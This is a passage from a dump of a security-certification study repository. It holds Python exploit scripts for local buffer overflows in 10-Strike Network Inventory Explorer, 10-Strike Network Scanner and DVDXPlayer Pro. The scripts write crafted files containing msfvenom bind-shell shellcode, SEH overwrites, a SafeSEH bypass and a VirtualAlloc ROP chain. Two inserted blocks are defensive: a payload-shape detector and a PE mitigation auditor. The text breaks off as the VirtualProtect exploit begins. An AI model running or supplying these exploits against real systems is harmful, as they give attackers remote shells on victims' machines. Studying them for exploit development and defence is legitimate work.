Repository: ihack4falafel/OSCE
Branch: master
Commit: c19500bd3934
Files: 37
Total size: 121.3 KB
Directory structure:
gitextract_ec6vv2vr/
├── Local Buffer Overflow/
│ ├── 10-StrikeNetworkInventoryExplorerv8.54/
│ │ ├── From Text File/
│ │ │ └── Exploit.py
│ │ ├── README.md
│ │ └── Registration Key/
│ │ └── Exploit.py
│ ├── 10-StrikeNetworkScannerv3.0/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── DVDXPlayerProv5.5/
│ │ ├── VirtualAlloc()/
│ │ │ └── Exploit.py
│ │ ├── VirtualProtect()/
│ │ │ └── Exploit.py
│ │ └── readme.md
│ ├── EasyCDDVDCopyv1.3.24/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── EasyRMtoMP3Converterv2.7.3.700/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── FTPShellServerv6.80/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── QuickZipv4.60.019/
│ │ ├── Egg Hunter/
│ │ │ └── Exploit.py
│ │ ├── OS Dependent/
│ │ │ └── Exploit.py
│ │ └── README.md
│ ├── SysGaugeProv4.6.12/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── VUPlayerv2.49/
│ │ ├── Exploit.py
│ │ └── readme.md
│ └── Zip-n-Gov4.9/
│ ├── Exploit.py
│ └── README.md
├── README.md
├── Remote Buffer Overflow/
│ ├── EasyFileSharingWebServerv7.2/
│ │ ├── Exploit.py
│ │ └── readme.md
│ └── VulnServer/
│ ├── Bad Characters/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── CALL [REG]/
│ │ └── Exploit.py
│ ├── Egg Hunter/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── POP POP RETN/
│ │ └── Exploit.py
│ ├── SEH/
│ │ ├── Exploit.py
│ │ └── README.md
│ └── readme.md
└── Tools/
├── EggHunter.py
└── FuzzMe.py
================================================
FILE CONTENTS
================================================
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/From Text File/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
'''
Steps to reproduce:
===================
- Under Computers tab click on 'From Text File'
- Open Evil.txt and boom!
Notes:
======
- The following modules have no protection, which makes the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
- The next SEH (nSEH) offset is 211 bytes, but for some reason passing the exception to the program shifts the
  stack by 8 bytes; see the buffer for reference.
- Keep in mind the exploit is contingent on the path, so make sure the offsets stay intact for your username. The
  following is the path used while developing the exploit (default on Windows 7):
  [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
- The Pro edition is affected as well.
'''
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
#Payload size: 355 bytes
shellcode = ""
shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"
buffer = '\x41' * 207 # filler to nSEH offset (211-4)
buffer += '\x9f\x4e\xe9\x61' # 0x61E94E9F [sqlite3.dll] | jmp esp
buffer += '\x90\x90\x90\x90' # nSEH
buffer += '\x90\x90\x90\x90' # SEH
buffer += shellcode # bind shell
buffer += '\xcc' * (3000-207-12-len(shellcode)) # junk
try:
    f = open("Evil.txt", "w")
    print "[+] Creating %s bytes evil payload.." % len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except Exception as e:
    print e
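The Evil.txt file written above has a characteristic shape: thousands of bytes of a single filler value, a short-jump stub in the nSEH slot, and a NOP or INT3 sled ahead of the shellcode. The following is an added example, not code from the ihack4falafel/OSCE repository, showing a defender-side heuristic in Python 3 that flags input with that shape before it reaches a parser such as the one the notes describe. The thresholds and the two constructed samples are assumptions chosen for the example; the jump stubs it looks for are the two already shown in this repository's exploits.

```python
"""Heuristic scan of an input field or file for buffer-overflow-style payload traits.

Added example (not part of the ihack4falafel/OSCE repository). It judges the
shape of the input only: long runs of one byte, NOP/INT3 sleds, the short-jump
stubs that typically sit in an overwritten nSEH slot, and non-printable bytes
in a field that should hold text.
"""
from itertools import groupby
from typing import List, Tuple

# Thresholds are assumptions chosen for this example, not values from the page.
MAX_FIELD_LEN = 1024      # a hostname, path or registration key never needs more
RUN_THRESHOLD = 64        # the same byte repeated this often is filler, not data
SLED_THRESHOLD = 8        # consecutive 0x90 (nop) / 0xcc (int3) bytes

# Short-jump stubs commonly placed in nSEH: "eb 06" = jmp +6,
# "75 06 74 06" = jne +6 / je +6.
JUMP_STUBS = (b"\xeb\x06", b"\x75\x06\x74\x06")


def longest_run(data: bytes) -> Tuple[int, int]:
    """Return (byte_value, length) of the longest run of one repeated byte."""
    best = (-1, 0)
    for value, group in groupby(data):
        length = sum(1 for _ in group)
        if length > best[1]:
            best = (value, length)
    return best


def payload_indicators(data: bytes) -> List[str]:
    """List the heuristic indicators found in data; an empty list means nothing odd."""
    findings = []
    if len(data) > MAX_FIELD_LEN:
        findings.append(f"oversized input ({len(data)} bytes)")
    value, length = longest_run(data)
    if length >= RUN_THRESHOLD:
        findings.append(f"filler run of 0x{value:02x} x {length}")
    for sled_byte, name in ((0x90, "nop"), (0xCC, "int3")):
        if bytes([sled_byte]) * SLED_THRESHOLD in data:
            findings.append(f"{name} sled")
    for stub in JUMP_STUBS:
        if stub in data:
            findings.append("short-jump stub " + stub.hex())
    # Control and high bytes do not belong in a hostname, key or path field.
    if any((b < 0x20 and b not in (0x09, 0x0A, 0x0D)) or b >= 0x7F for b in data):
        findings.append("non-printable bytes")
    return findings


def scan_file(path: str) -> List[str]:
    """Run the heuristic over a file on disk (e.g. a text file about to be imported)."""
    with open(path, "rb") as fh:
        return payload_indicators(fh.read())


# Constructed samples: a benign hostname and an overflow-shaped input.
BENIGN = b"fileserver01.corp.example"
OVERFLOW_SHAPED = b"A" * 300 + b"\xeb\x06\x90\x90" + b"\x90" * 16 + b"\xcc" * 800

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("overflow-shaped", OVERFLOW_SHAPED)):
        print(label, "->", payload_indicators(sample) or "clean")
```

Any one indicator on its own can occur in legitimate data (a long line of dashes is a filler run), so treat the list as a score to alert on rather than a verdict; an import path that rejects anything over `MAX_FIELD_LEN` removes the whole class of inputs shown on this page regardless of the other checks.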
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/README.md
================================================
### 10-Strike Network Inventory Explorer 8.54
Structured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the links [EDB-ID: 44841](https://www.exploit-db.com/exploits/44838/) and [EDB-ID: 44840](https://www.exploit-db.com/exploits/44840/)
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/10-StrikeNetworkInventoryExplorerv8.54/From%20Text%20File/PoC.gif">
</p>
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/Registration Key/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Inventory Explorer Standard v8.54 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe #
# Tested on : Windows 7 Enterprise - SP1 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
'''
Steps to reproduce:
===================
- Under Help, click 'Enter Registration Key'.
- Paste the contents of Evil.txt and click OK.
Notes:
======
- The following modules have no protection, which makes the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
- There is ample space prior to the SEH overwrite.
- The Pro edition is affected as well.
'''
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
#Payload size: 355 bytes
shellcode = ""
shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"
buffer = '\x41' * 4188                             # filler to nSEH
buffer += '\x75\x06\x74\x06'                       # nSEH | jump next (jne +6 / je +6)
buffer += '\x7a\x49\xe8\x61'                       # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += '\x90' * 8                               # nops
buffer += shellcode                                # bind shell
buffer += '\x41' * (5000-4188-16-len(shellcode))   # junk
try:
    f = open("Evil.txt", "w")
    print "[+] Creating %s bytes evil payload.." % len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except Exception as e:
    print e
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkScannerv3.0/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : 10-Strike Network Scanner v3.0 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : https://www.10-strike.com/ #
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe #
# Tested on : Windows XP Professional - SP3 (x86) #
#----------------------------------------------------------------------------------------------------------#
# Disclosure Timeline:
# ====================
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
'''
Steps to reproduce:
===================
- Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
- Right-click on newly created host and click 'Trace route...'.
- Repeat the second step and boom.
Notes:
======
- '\x00' gets converted to '\x20' by the program, which rules out [pop, pop, retn] pointers in the base binary.
- All loaded modules are compiled with /SafeSEH.
- 'System information > General' (right-click on the newly created host) is affected by the same vulnerability,
  with different offsets and buffer size.
'''
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
#Payload size: 355 bytes
shellcode = ""
shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"
magic = '\xd9\xee' # fldz
magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc]
magic += '\x59' # pop ecx
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x90' # nop
magic += '\xfe\xcd' # dec ch
magic += '\xfe\xcd' # dec ch
magic += '\xff\xe1' # jmp ecx
buffer = '\x90' * 28                                  # nops
buffer += shellcode                                   # bind shell
buffer += '\xcc' * (516-28-len(shellcode))            # filler to nSEH
buffer += '\x75\x06\x74\x06'                          # nSEH | jump next (jne +6 / je +6)
buffer += '\x18\x05\xfc\x7f'                          # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += '\x90' * 5                                  # nops
buffer += magic                                       # jump -512
buffer += '\xcc' * (3000-516-4-4-5-len(magic))        # junk
try:
    f = open("Evil.txt", "w")
    print "[+] Creating %s bytes evil payload.." % len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except Exception as e:
    print e
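The notes above turn on what protections the loaded modules were built with: here every module is compiled with /SafeSEH, while the Network Inventory Explorer notes list modules "with no protection". A defender can audit that before shipping or deploying a product. The following is an added example, not code from the ihack4falafel/OSCE repository, that reads the DllCharacteristics word from a PE header and reports whether the module opted into ASLR (DYNAMIC_BASE), DEP (NX_COMPAT) and NO_SEH. Note that /SafeSEH itself is recorded separately, in the Load Config directory's SEHandlerTable, so it is outside what these three bits show. The `build_stub_pe` helper and the two sample module names are constructed for testing and are not real binaries.

```python
"""Audit PE modules for the DllCharacteristics mitigation flags.

Added example (not part of the ihack4falafel/OSCE repository). Reads
IMAGE_OPTIONAL_HEADER.DllCharacteristics and reports ASLR, DEP and NO_SEH
opt-in. /SafeSEH lives in the Load Config directory and is not checked here.
"""
import struct
from typing import Dict, List

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400         # image uses no SEH at all

FLAGS = {
    "aslr": IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,
    "dep": IMAGE_DLLCHARACTERISTICS_NX_COMPAT,
    "no_seh": IMAGE_DLLCHARACTERISTICS_NO_SEH,
}


def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics word of a PE image (PE32 or PE32+)."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image: missing PE signature")
    # IMAGE_FILE_HEADER is 20 bytes; SizeOfOptionalHeader sits at +16 inside it.
    (opt_size,) = struct.unpack_from("<H", image, e_lfanew + 4 + 16)
    opt_off = e_lfanew + 4 + 20
    if opt_size < 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    (magic,) = struct.unpack_from("<H", image, opt_off)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    # DllCharacteristics is at offset 70 in both the PE32 and PE32+ optional headers.
    (chars,) = struct.unpack_from("<H", image, opt_off + 70)
    return chars


def mitigations(image: bytes) -> Dict[str, bool]:
    """Map each mitigation name to whether the image opted into it."""
    chars = dll_characteristics(image)
    return {name: bool(chars & bit) for name, bit in FLAGS.items()}


def audit(modules: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map each module name to the list of mitigations it lacks."""
    return {name: [m for m, on in mitigations(img).items() if not on]
            for name, img in modules.items()}


def build_stub_pe(chars: int, pe32plus: bool = False) -> bytes:
    """Construct a minimal header-only PE image carrying the given flags (test data only)."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64)        # e_lfanew = 64
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                       0, 0, 0, 0, opt_size, 0x2102)
    opt = struct.pack("<H", 0x20B if pe32plus else 0x10B)
    opt += b"\x00" * 68                                       # pad to offset 70
    opt += struct.pack("<H", chars)
    opt += b"\x00" * (opt_size - len(opt))
    return dos + b"PE\x00\x00" + coff + opt


# Constructed sample "modules": one with all three flags, one with none.
SAMPLE_MODULES = {
    "hardened.dll": build_stub_pe(0x0040 | 0x0100 | 0x0400),
    "legacy.dll": build_stub_pe(0),
}

if __name__ == "__main__":
    for name, missing in audit(SAMPLE_MODULES).items():
        print(f"{name}: {'ok' if not missing else 'missing ' + ', '.join(missing)}")
```

To audit a real installation, feed `audit` a dict of `{filename: open(path, "rb").read()}` over the product's DLLs; a module reported as lacking `aslr` is exactly the kind of fixed-address module the notes on this page rely on, and lacking `dep` means the process may run with data pages executable if the executable does not enforce it process-wide.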
================================================
FILE: Local Buffer Overflow/10-StrikeNetworkScannerv3.0/README.md
================================================
### 10-Strike Network Scanner v3.0
Structured Exception Handler (SEH) overwrite exploit found while studying for OSCE. See the link [EDB-ID: 44841](https://www.exploit-db.com/exploits/44841/)
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/10-StrikeNetworkScannerv3.0/PoC.gif">
</p>
================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/VirtualAlloc()/Exploit.py
================================================
#!/usr/bin/env python
import struct
import time
# bad characters "\x00\x0a\x0d\x1a\x20"
shellcode = ""
shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
buffer = "\x41" * 260 # eip offset
#----------------------------------------#
# ROP Chain setup for VirtualAlloc() #
#----------------------------------------#
# EAX = NOP (0x90909090) #
# ECX = flProtect (0x40) #
# EDX = flAllocationType (0x1000) #
# EBX = dwSize #
# ESP = lpAddress (automatic) #
# EBP = ReturnTo (ptr to jmp esp) #
# ESI = ptr to VirtualAlloc() #
# EDI = ROP NOP (RETN) #
#----------------------------------------#
buffer += struct.pack('<L', 0x6033cda2) # POP EAX # RETN [Configuration.dll]
buffer += "MMMM" # compensate (filler)
buffer += "MMMM" # compensate (filler)
buffer += "WWWW" # compensate (filler)
buffer += "WWWW" # compensate (filler)
buffer += struct.pack('<L', 0x603662fc) # ptr to &VirtualAlloc() [IAT Configuration.dll]
buffer += struct.pack('<L', 0x6410b24d) # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll]
buffer += struct.pack('<L', 0x616385d8) # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
buffer += struct.pack('<L', 0x61626545) # POP EBP # RETN [EPG.dll]
buffer += struct.pack('<L', 0x6035453b) # & push esp # ret 0x10 [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61640124) # XCHG EAX,EBX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffffc0) # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x60366fe4) # XCHG EAX,ECX # RETN [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffefff) # value to negate, will become 0x00001000
buffer += struct.pack('<L', 0x61628105) # INC EAX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61608ba2) # XCHG EAX,EDX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x6162c3b0) # POP EDI # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64041804) # RETN (ROP NOP) [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x640390d3) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x90909090) # NOP
buffer += struct.pack('<L', 0x60358d9f) # PUSHAD # RETN [Configuration.dll]
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*28)-40-len(shellcode))
try:
    f = open("OpenMe.plf", "w")
    print "[+] Creating %s bytes evil payload.." % len(buffer)
    time.sleep(1)
    f.write(buffer)
    f.close()
    print "[+] File created. Load that shit up!"
except:
    print "File cannot be created"
================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/VirtualProtect()/Exploit.py
================================================
#!/usr/bin/env python
import struct
import time
# bad characters "\x00\x0a\x0d\x1a\x20"
shellcode = ""
